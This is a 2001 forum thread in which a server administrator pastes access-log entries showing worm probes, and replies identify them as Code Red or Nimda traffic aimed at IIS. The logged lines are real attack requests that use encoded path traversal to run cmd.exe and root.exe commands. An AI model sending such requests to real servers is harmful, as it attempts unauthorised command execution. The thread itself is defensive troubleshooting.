Hammerton Posted December 17, 2001 Share Posted December 17, 2001 I recently started up a new FM5 Unlimited server set-up. Over the weekend I got an enormous number of requests, all of the sort that I have pasted below. The sites that I serve are academic and should not be getting any hits. Are these robots? Hacks? Or is this what a typical visit looks like on the access log. I previously used FM4.1 and it either didn't have this feature or I was too stupid to use it. I have limited IP access to my subnet so I don't think any damage was done in any event. 203.73.193.54 - - [15/Dec/2001:07:51:52 -0600] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 1372 203.73.193.54 - - [15/Dec/2001:07:52:16 -0600] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 1368 203.73.193.54 - - [15/Dec/2001:07:52:18 -0600] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1388 203.73.193.54 - - [15/Dec/2001:07:52:20 -0600] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1388 203.73.193.54 - - [15/Dec/2001:07:52:31 -0600] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1416 203.73.193.54 - - [15/Dec/2001:07:52:32 -0600] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1450 203.73.193.54 - - [15/Dec/2001:07:52:37 -0600] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1450 203.73.193.54 - - [15/Dec/2001:07:54:12 -0600] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1424 203.73.193.54 - - [15/Dec/2001:07:54:14 -0600] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1424 Link to comment Share on other sites More sharing options...
MpWiedemann Posted December 17, 2001 Share Posted December 17, 2001 Those hits are from an internet worm. Either "Code Red" or "Nimda". If you are running IIS, make sure you have installed all the Microsoft Code Red patches. The hits are comming from other unpatched and infected IIS servers. Other than installing the patches there is not much you can do to prevent this. Good luck, Martin Link to comment Share on other sites More sharing options...
Hammerton Posted December 17, 2001 Author Share Posted December 17, 2001 Thanks Martin. I am running webstar on an old mac, and connecting to FM5U thru the FMWSC. Does any of that afford me protection? How do other folks deal with this? I read some posts about blocking access to those IPs but that seems futile given the volume. Link to comment Share on other sites More sharing options...
MpWiedemann Posted December 17, 2001 Share Posted December 17, 2001 As long as you are not using IIS on Windows you are safe. Link to comment Share on other sites More sharing options...
dwal Posted December 18, 2001 Share Posted December 18, 2001 IPNetSentry from http://www.sustworks.com will stop these 'Nimda' hits. Link to comment Share on other sites More sharing options...
Hammerton Posted December 20, 2001 Author Share Posted December 20, 2001 Dwal - Thanks. IPNetSentry is great! see my post titled Cool Security Solution Link to comment Share on other sites More sharing options...
Recommended Posts
This topic is 8163 days old. Please don't post here. Open a new topic instead.
Create an account or sign in to comment
You need to be a member in order to leave a comment
Create an account
Sign up for a new account in our community. It's easy!
Register a new accountSign in
Already have an account? Sign in here.
Sign In Now